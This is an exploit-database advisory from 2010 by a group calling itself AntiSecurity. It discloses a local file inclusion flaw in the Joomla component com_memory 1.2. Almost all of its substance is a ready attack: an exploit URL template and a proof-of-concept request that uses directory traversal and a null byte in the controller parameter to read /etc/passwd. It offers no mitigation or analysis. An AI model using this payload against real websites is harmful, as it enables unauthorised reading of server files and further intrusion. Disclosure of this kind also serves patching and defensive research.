id: 11751
date: 04/12/2010
title: Joomla Component com_memory Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

==============================================================
Joomla Component com_memory Local File Inclusion Vulnerability
==============================================================

============================================================================================================
 
 
  [o] Joomla Component Memory Book Local File Inclusion Vulnerability
  
       Software : com_memory version 1.2
       Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
============================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_memory&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_memory&controller=../../../../../../../../../../etc/passwd%00
 
 
============================================================================================================



#  0day.today [2023-03-26]  #